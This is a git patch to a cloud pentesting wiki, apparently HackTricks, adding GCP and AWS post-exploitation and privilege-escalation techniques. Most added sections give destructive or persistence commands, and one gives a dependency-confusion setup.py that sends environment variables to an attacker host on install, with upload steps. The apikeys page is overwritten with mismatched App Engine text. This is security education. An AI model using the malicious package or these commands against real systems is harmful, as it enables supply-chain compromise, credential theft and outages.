From 5380f79daff81aed631edfda9e26eeaa99f69852 Mon Sep 17 00:00:00 2001 From: JaimePolop Date: Tue, 25 Nov 2025 17:13:06 +0100 Subject: [PATCH 1/3] GCP update --- src/SUMMARY.md | 1 + .../aws-rds-post-exploitation/README.md | 34 ++ .../gcp-app-engine-post-exploitation.md | 13 +- .../gcp-cloud-functions-post-exploitation.md | 23 +- .../gcp-cloud-run-post-exploitation.md | 13 + .../gcp-iam-post-exploitation.md | 37 +- .../gcp-kms-post-exploitation.md | 30 ++ .../gcp-pub-sub-post-exploitation.md | 28 ++ .../gcp-secretmanager-post-exploitation.md | 31 ++ .../gcp-storage-post-exploitation.md | 71 ++- .../gcp-apikeys-privesc.md | 161 ++++-- .../gcp-artifact-registry-privesc.md | 60 +++ .../gcp-cloudfunctions-privesc.md | 25 +- .../gcp-compute-privesc/README.md | 151 ------ .../gcp-add-custom-ssh-metadata.md | 100 ---- .../gcp-firebase-privesc.md | 474 ++++++++++++++++++ .../gcp-iam-privesc.md | 47 +- .../gcp-pubsub-privesc.md | 43 +- .../gcp-run-privesc.md | 55 +- .../gcp-secretmanager-privesc.md | 7 + .../gcp-storage-privesc.md | 64 ++- 21 files changed, 1074 insertions(+), 394 deletions(-) delete mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md delete mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index eba659a072..803b176ad1 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -125,6 +125,7 @@ - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) + - [GCP - Firebase Privesc](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-privesc.md) - [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) - [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) - [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md index b9f42ec05c..66dcf443d1 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md @@ -57,6 +57,40 @@ aws rds stop-db-cluster \ --db-cluster-identifier ``` +### `rds:Modify*` +An attacker granted rds:Modify* permissions can alter critical configurations and auxiliary resources (parameter groups, option groups, proxy endpoints and endpoint-groups, target groups, subnet groups, capacity settings, snapshot/cluster attributes, certificates, integrations, etc.) without touching the instance or cluster directly. Changes such as adjusting connection/time-out parameters, changing a proxy endpoint, modifying which certificates are trusted, altering logical capacity, or reconfiguring a subnet group can weaken security (open new access paths), break routing and load-balancing, invalidate replication/backup policies, and generally degrade availability or recoverability. These modifications can also facilitate indirect data exfiltration or hinder an orderly recovery of the database after an incident. + +Move or change the subnets assigned to an RDS subnet group: + +```bash +aws rds modify-db-subnet-group \ + --db-subnet-group-name \ + --subnet-ids +``` + +Alter low-level engine parameters in a cluster parameter group: + +```bash +aws rds modify-db-cluster-parameter-group \ + --db-cluster-parameter-group-name \ + --parameters "ParameterName=,ParameterValue=,ApplyMethod=immediate" +``` + +### `rds:Restore*` + +An attacker with rds:Restore* permissions can restore entire databases from snapshots, automated backups, point-in-time recovery (PITR), or files stored in S3, creating new instances or clusters populated with the data from the selected point. These operations do not overwrite the original resources — they create new objects containing the historical data — which allows an attacker to obtain full, functional copies of the database (from past points in time or from external S3 files) and use them to exfiltrate data, manipulate historical records, or rebuild previous states. + +Restore a DB instance to a specific point in time: + +```bash +aws rds restore-db-instance-to-point-in-time \ + --source-db-instance-identifier \ + --target-db-instance-identifier \ + --restore-time "" \ + --db-instance-class \ + --publicly-accessible --no-multi-az +``` + ### `rds:Delete*` An attacker granted rds:Delete* can remove RDS resources, deleting DB instances, clusters, snapshots, automated backups, subnet groups, parameter/option groups and related artifacts, causing immediate service outage, data loss, destruction of recovery points and loss of forensic evidence. diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md index 725c94c857..3f96515f6d 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md @@ -28,15 +28,18 @@ With these permissions it's possible to: With this permission it's possible to **see the logs of the App**: -
- -Tail app logs - ```bash gcloud app logs tail -s ``` -
+### Service and version deletion + +The `appengine.versions.delete`, `appengine.versions.list`, and `appengine.services.list` permissions allow managing and deleting specific versions of an App Engine application, which can affect traffic if it is split or if the only stable version is removed. Meanwhile, the `appengine.services.delete` and `appengine.services.list` permissions allow listing and deleting entire services—an action that immediately disrupts all traffic and the availability of the associated versions. + +```bash +gcloud app versions delete +gcloud app services delete +``` ### Read Source Code diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md index 502c49436f..198872b67b 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md @@ -14,10 +14,6 @@ Find some information about Cloud Functions in: With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function: -
- -Get signed URL for source code download - ```bash curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \ -H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \ @@ -25,7 +21,18 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca -d '{}' ``` -
+### `cloudfunctions.functions.delete` +The `cloudfunctions.functions.delete` permission allows an identity to completely delete a Cloud Function, including its code, configuration, triggers, and its association with service accounts. + +```bash +gcloud functions delete \ + --region=us-central1 \ + --quiet +``` + +### Code Exfiltration through the bucket +The `storage.objects.get` and `storage.objects.list` permissions allow listing and reading objects inside a bucket, and in the case of Cloud Functions this is especially relevant because each function stores its source code in an automatically managed Google bucket, whose name follows the format `gcf-sources--` + ### Steal Cloud Function Requests @@ -35,10 +42,6 @@ Moreover, Cloud Functions running in python use **flask** to expose the web serv For example this code implements the attack: -
- -Steal Cloud Function requests (Python injection) - ```python import functions_framework @@ -136,8 +139,6 @@ def injection(): return str(e) ``` -
- {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md index 99cdea20d5..cd5588176f 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md @@ -10,6 +10,19 @@ For more information about Cloud Run check: ../gcp-services/gcp-cloud-run-enum.md {{#endref}} +### Delete CloudRun Job +The `run.services.delete` and `run.services.get permissions`, as well as run.jobs.delete, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks. + +To delete a job, the following operation can be performed. +```bash +gcloud run jobs delete --region= --quiet +``` + +To delete a service, the following operation can be performed. +```bash +gcloud run services delete --region= --quiet +``` + ### Access the images If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables. diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md index e0075121fe..3e09b53d09 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md @@ -18,20 +18,45 @@ To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, You can use the following command to **grant a user the primitive role of Editor** to your existing project: -
- -Grant Editor role to user - ```bash gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor ``` -
- If you succeeded here, try **accessing the web interface** and exploring from there. This is the **highest level you can assign using the gcloud tool**. +### Delete IAM components `iam.*.delete` +The `iam.*.delete` permissions (e.g., `iam.roles.delete`, `iam.serviceAccountApiKeyBindings.delete`, `iam.serviceAccountKeys.delete`, etc.) allow an identity to delete critical IAM components such as custom roles, API key bindings, service account keys, and the service accounts themselves. In the hands of an attacker, this makes it possible to remove legitimate access mechanisms in order to cause a denial of service. + +To carry out such an attack, it is possible, for example, to delete roles using: +```bash +gcloud iam roles delete --project= +``` + +### `iam.serviceAccountKeys.disable` || `iam.serviceAccounts.disable` + +The `iam.serviceAccountKeys.disable` and `iam.serviceAccounts.disable` permissions allow disabling active service account keys or service accounts, which in the hands of an attacker could be used to disrupt operations, cause denial of service, or hinder incident response by preventing the use of legitimate credentials. + +To disable a Service Account, you can use the following command: + +```bash +gcloud iam service-accounts disable --project= +``` + +To disable the keys of a Service Account, you can use the following command: + +```bash +gcloud iam service-accounts keys disable --iam-account= +``` + +### `iam.*.undelete` +The `iam.*.undelete` permissions allow restoring previously deleted elements such as API key bindings, custom roles, or service accounts. In the hands of an attacker, this can be used to reverse defensive actions (recover removed access), re-establish deleted compromise vectors to maintain persistence, or evade remediation efforts, complicating incident containment. + +```bash +gcloud iam service-accounts undelete "${SA_ID}" --project="${PROJECT}" +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md index 1831f24d1c..8cfa1adebc 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md @@ -282,6 +282,36 @@ verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key print('Verified:', verified) ``` +### `cloudkms.cryptoKeyVersions.restore` +The `cloudkms.cryptoKeyVersions.restore` permission allows an identity to restore a key version that was previously scheduled for destruction or disabled in Cloud KMS, returning it to an active and usable state. + +```bash +gcloud kms keys versions restore \ + --key= \ + --keyring= \ + --location= \ + --project= +``` + +### `cloudkms.cryptoKeyVersions.update` +The `cloudkms.cryptoKeyVersions.update` permission allows an identity to modify the attributes or the state of a specific key version in Cloud KMS, for example by enabling or disabling it. + +```bash +# Disable key +gcloud kms keys versions disable \ + --key= \ + --keyring= \ + --location= \ + --project= + +# Enable key +gcloud kms keys versions enable \ + --key= \ + --keyring= \ + --location= \ + --project= +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md index c12ba98b0e..9a708d9e37 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md @@ -62,6 +62,34 @@ Use this permission to update some setting of the topic to disrupt it, like `--c Give yourself permission to perform any of the previous attacks. +```bash +# Add Binding +gcloud pubsub topics add-iam-policy-binding \ + --member="serviceAccount:@.iam.gserviceaccount.com" \ + --role="" \ + --project="" + +# Remove Binding +gcloud pubsub topics remove-iam-policy-binding \ + --member="serviceAccount:@.iam.gserviceaccount.com" \ + --role="" \ + --project="" + +# Change Policy +gcloud pubsub topics set-iam-policy \ + <(echo '{ + "bindings": [ + { + "role": "", + "members": [ + "serviceAccount:@.iam.gserviceaccount.com" + ] + } + ] + }') \ + --project= +``` + ### **`pubsub.subscriptions.create,`**`pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`) Get all the messages in a web server: diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md index 6bf39c96a9..e93aeac905 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md @@ -25,6 +25,37 @@ gcloud secrets versions access 1 --secret="" +### `secretmanager.versions.destroy` +The `secretmanager.versions.destroy` permission allows an identity to permanently destroy (mark as irreversibly deleted) a specific version of a secret in Secret Manager, which could enable the removal of critical credentials and potentially cause denial of service or prevent the recovery of sensitive data. + +```bash +gcloud secrets versions destroy --secret="" --project= +``` + +### `secretmanager.versions.disable` +The `secretmanager.versions.disable` permission allows an identity to disable active secret versions in Secret Manager, temporarily blocking their use by applications or services that depend on them. + +```bash +gcloud secrets versions disable --secret="" --project= +``` + +### `secretmanager.secrets.delete` +The `secretmanager.secrets.delete` permission set allows an identity to completely delete a secret and all of its stored versions in Secret Manager. + +```bash +gcloud secrets delete --project= +``` + +### `secretmanager.secrets.update` +The `secretmanager.secrets.update` permission allows an identity to modify a secret’s metadata and configuration (for example, rotation settings, version policy, labels, and certain secret properties). + +```bash +gcloud secrets update SECRET_NAME \ + --project=PROJECT_ID \ + --clear-labels \ + --rotation-period=DURATION +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md index 94b7ccc610..1ea8a8fe08 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md @@ -14,10 +14,6 @@ For more information about CLoud Storage check this page: It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket: -
- -Make bucket/objects public - ```bash # Disable public prevention gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention @@ -31,12 +27,75 @@ gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,r gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER ``` -
- If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access` To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/` +### `storage.objects.delete` (`storage.objects.get`) + +To delete an object: +```bash +gcloud storage rm gs:/// --project= +``` + +### `storage.buckets.delete`, `storage.objects.delete` & `storage.objects.list` + +To delete a bucket: +```bash +gcloud storage rm -r gs:// +``` + +### Deactivate HMAC Keys + +The `storage.hmacKeys.update` permission allows disabling HMAC keys, and the `storage.hmacKeys.delete` permission allows an identity to delete HMAC keys associated with service accounts in Cloud Storage. + +```bash +# Deactivate +gcloud storage hmac update --deactivate + +# Delete +gcloud storage hmac delete +``` + + +### `storage.buckets.setIpFilter` & `storage.buckets.update` +The `storage.buckets.setIpFilter` permission, together with the `storage.buckets.update` permission, allows an identity to configure IP address filters on a Cloud Storage bucket, specifying which IP ranges or addresses are allowed to access the bucket’s resources. + +To completely clear the IP filter, the following command can be used: + +```bash +gcloud storage buckets update gs:// --project= +``` + +To change the filtered IPs, the following command can be used: + +```bash +gcloud storage buckets update gs:// \ + --ip-filter-file=ip-filter.json \ + --project= +``` + +The JSON file represents the filter itself, something like: +```bash +{ + "mode": "Enabled", + "publicNetworkSource": { + "allowedIpCidrRanges": ["/"] + }, + "allowCrossOrgVpcs": false, + "allowAllServiceAgentAccess": false +} +``` + +### `storage.buckets.restore` +Restore a bucket using: + +```bash +gcloud storage restore gs://# \ + --project= +``` + + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md index 314af2fa85..3385dffa13 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md @@ -1,95 +1,154 @@ -# GCP - Apikeys Privesc +# GCP - AppEngine Privesc {{#include ../../../banners/hacktricks-training.md}} -## Apikeys +## App Engine -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -For more information about API Keys check: +For more information about App Engine check: {{#ref}} -../gcp-services/gcp-api-keys-enum.md +../gcp-services/gcp-app-engine-enum.md {{#endref}} -For other ways to create API keys check: +### `appengine.applications.get`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.operations.list`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.create`, `appengine.versions.get`, `appengine.versions.list`, `cloudbuild.builds.get`,`iam.serviceAccounts.actAs`, `resourcemanager.projects.get`, `storage.objects.create`, `storage.objects.list` -{{#ref}} -gcp-serviceusage-privesc.md -{{#endref}} +Those are the needed permissions to **deploy an App using `gcloud` cli**. Maybe the **`get`** and **`list`** ones could be **avoided**. + +You can find python code examples in [https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine) + +By default, the name of the App service is going to be **`default`**, and there can be only 1 instance with the same name.\ +To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`** + +```bash +cd python-docs-samples/appengine/flexible/hello_world +gcloud app deploy #Upload and start application inside the folder +``` -### Brute Force API Key access +Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes. -As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** +> [!NOTE] +> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used. -### `apikeys.keys.create` +The URL of the application is something like `https://.oa.r.appspot.com/` or `https://-dot-.oa.r.appspot.com` -This permission allows to **create an API key**: +### Update equivalent permissions -
-Create an API key using gcloud +You might have enough permissions to update an AppEngine but not to create a new one. In that case this is how you could update the current App Engine: ```bash -gcloud services api-keys create -Operation [operations/akmf.p7-[...]9] complete. Result: { - "@type":"type.googleapis.com/google.api.apikeys.v2.Key", - "createTime":"2022-01-26T12:23:06.281029Z", - "etag":"W/\"HOhA[...]=\"", - "keyString":"AIzaSy[...]oU", - "name":"projects/5[...]6/locations/global/keys/f707[...]e8", - "uid":"f707[...]e8", - "updateTime":"2022-01-26T12:23:06.378442Z" -} +# Find the code of the App Engine in the buckets +gsutil ls + +# Download code +mkdir /tmp/appengine2 +cd /tmp/appengine2 +## In this case it was found in this custom bucket but you could also use the +## buckets generated when the App Engine is created +gsutil cp gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip . +unzip labs_appengine_1_premissions_privesc.zip + +## Now modify the code.. + +## If you don't have an app.yaml, create one like: +cat >> app.yaml <@$PROJECT_ID.iam.gserviceaccount.com ``` -
+If you have **already compromised a AppEngine** and you have the permission **`appengine.applications.update`** and **actAs** over the service account to use you could modify the service account used by AppEngine with: -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh). +```bash +gcloud app update --service-account=@$PROJECT_ID.iam.gserviceaccount.com +``` -> [!CAUTION] -> Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**. +### `appengine.instances.enableDebug`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.get`, `appengine.versions.list`, `compute.projects.get` -### `apikeys.keys.getKeyString` , `apikeys.keys.list` +With these permissions, it's possible to **login via ssh in App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **could not be really needed**. + +```bash +gcloud app instances ssh --service --version +``` -These permissions allows **list and get all the apiKeys and get the Key**: +### `appengine.applications.update`, `appengine.operations.get` -
-List and retrieve all API keys +I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account. ```bash -for key in $(gcloud services api-keys list --uri); do - gcloud services api-keys get-key-string "$key" -done +gcloud app update --service-account= ``` -
+### `appengine.versions.getFileContents`, `appengine.versions.update` + +Not sure how to use these permissions or if they are useful (note that when you change the code a new version is created so I don't know if you can just update the code or the IAM role of one, but I guess you should be able to, maybe changing the code inside the bucket??). + +### `bigquery.tables.delete`, `bigquery.datasets.delete` & `bigquery.models.delete` (`bigquery.models.getMetadata`) + +To remove tables, dataset or models: +```bash +# Table removal +bq rm -f -t .. + +# Dataset removal +bq rm -r -f : + +# Model removal +bq rm -m :. +``` -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). +### Abuse of Scheduled Queries -### `apikeys.keys.undelete` , `apikeys.keys.list` +With the `bigquery.datasets.get`, `bigquery.jobs.create`, and `iam.serviceAccounts.actAs` permissions, an identity can query dataset metadata, launch BigQuery jobs, and execute them using a Service Account with higher privileges. -These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done: +This attack enables malicious use of Scheduled Queries to automate queries (running under the chosen Service Account), which can, for example, lead to sensitive data being read and written into another table or dataset that the attacker does have access to—facilitating indirect and continuous exfiltration without needing to extract the data externally. -
-List and undelete API keys +Once the attacker knows which Service Account has the necessary permissions to execute the desired query, they can create a Scheduled Query configuration that runs using that Service Account and periodically writes the results into a dataset of their choosing. ```bash -gcloud services api-keys list --show-deleted -gcloud services api-keys undelete +bq mk \ + --transfer_config \ + --project_id= \ + --location=US \ + --data_source=scheduled_query \ + --target_dataset= \ + --display_name="Generic Scheduled Query" \ +--service_account_name="@.iam.gserviceaccount.com" \ + --schedule="every 10 minutes" \ + --params='{ + "query": "SELECT * FROM `..`;", + "destination_table_name_template": "", + "write_disposition": "WRITE_TRUNCATE" + }' + ``` -
+### Write Access over the buckets + +As mentioned the appengine versions generate some data inside a bucket with the format name: `staging..appspot.com`. Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name `appspot.com`. -### Create Internal OAuth Application to phish other workers +However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the AppEngine version by monitoring the bucket and any time a change is performed, modify as fast as possible the code. This way, the container that gets created from this code will **execute the backdoored code**. -Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin): +For more information and a **PoC check the relevant information from this page**: {{#ref}} -../../workspace-security/gws-google-platforms-phishing/ +gcp-storage-privesc.md {{#endref}} +### Write Access over the Artifact Registry + +Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ +It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md index 6e8e495f6c..2c77f4b474 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md @@ -228,6 +228,66 @@ When a Cloud Function is created a new docker image is pushed to the Artifact Re Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. + +### `artifactregistry.repositories.update` +An attacker does not need specific Artifact Registry permissions to exploit this issue—only a vulnerable virtual-repository configuration. This occurs when a virtual repository combines a remote public repository (e.g., PyPI, npm) with an internal one, and the remote source has equal or higher priority. If both contain a package with the same name, the system selects the highest version. The attacker only needs to know the internal package name and be able to publish packages to the corresponding public registry. + +With the `artifactregistry.repositories.update` permission, an attacker could change a virtual repository’s upstream settings to intentionally create this vulnerable setup and use Dependency Confusion as a persistence method by inserting malicious packages that developers or CI/CD systems may install automatically. + +The attacker creates a malicious version of the internal package in the public repository with a higher version number. For Python packages, this means preparing a package structure that mimics the legitimate one. + +```bash +mkdir /tmp/malicious_package +cd /tmp/malicious_package +PACKAGE_NAME="" +mkdir "$PACKAGE_NAME" +touch "$PACKAGE_NAME/__init__.py" +``` + +A setup.py file is then created containing malicious code that would run during installation. This file must specify a version number higher than the one in the private repository. + +```bash +cat > setup.py << 'EOF' +import setuptools +from setuptools.command.install import install +import os +import urllib.request +import urllib.parse + +def malicious_function(): + data = dict(os.environ) + encoded_data = urllib.parse.urlencode(data).encode() + url = 'https:///exfil' + req = urllib.request.Request(url, data=encoded_data) + urllib.request.urlopen(req) + +class AfterInstall(install): + def run(self): + install.run(self) + malicious_function() + +setuptools.setup( + name = "", + version = "0.1.1", + packages = [""], + cmdclass={'install': AfterInstall}, +) +EOF +``` +Build the package and delete the wheel to ensure the code is executed during installation. +```bash +python3 setup.py sdist bdist_wheel +rm dist/*.whl +``` + +Upload the malicious package to the public repository (for example, test.pypi.org for Python). +```bash +pip install twine +twine upload --repository testpypi dist/* +``` + +When a system or service installs the package using the virtual repository, it will download the malicious version from the public repository instead of the legitimate internal one, because the malicious version is higher and the remote repository has equal or higher priority. + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md index 5f853fe3d1..2c08fdf3e1 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md @@ -26,8 +26,6 @@ An attacker with these privileges can **modify the code of a Function and even m Some extra privileges like `.call` permission for version 1 cloudfunctions or the role `role/run.invoker` to trigger the function might be required. -
Update Cloud Function with malicious code to exfiltrate service account token - ```bash # Create new code temp_dir=$(mktemp -d) @@ -58,8 +56,6 @@ gcloud functions deploy \ gcloud functions call ``` -
- > [!CAUTION] > If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it. @@ -69,8 +65,6 @@ The exploit script for this method can be found [here](https://github.com/RhinoS With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)** -
Generate signed upload URL for Cloud Function - ```bash # Generate the URL curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \ @@ -79,18 +73,33 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca -d '{}' ``` -
- Not really sure how useful only this permission is from an attackers perspective, but good to know. ### `cloudfunctions.functions.setIamPolicy` , `iam.serviceAccounts.actAs` Give yourself any of the previous **`.update`** or **`.create`** privileges to escalate. +```bash +gcloud functions add-iam-policy-binding \ + --region= \ + --member="" \ + --role="roles/cloudfunctions.invoker" +``` + ### `cloudfunctions.functions.update` Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.actAs`** you **won't be able to update the function SO THIS IS NOT A VALID PRIVESC.** +### Invoke functions +With the `cloudfunctions.functions.get`, `cloudfunctions.functions.invoke`, `run.jobs.run`, and run.routes.invoke permissions, an identity can directly invoke Cloud Functions. It is also necessary for the function to allow public traffic, or for the caller to be within the same network as the function itself. + +```bash +curl -X POST "https://" \ +-H "Authorization: bearer $(gcloud auth print-identity-token)" \ +-H "Content-Type: application/json" \ +-d '{ "name": "Developer" }' +``` + ### Read & Write Access over the bucket If you have read and write access over the bucket you can monitor changes in the code and whenever an **update in the bucket happens you can update the new code with your own code** that the new version of the Cloud Function will be run with the submitted backdoored code. diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md 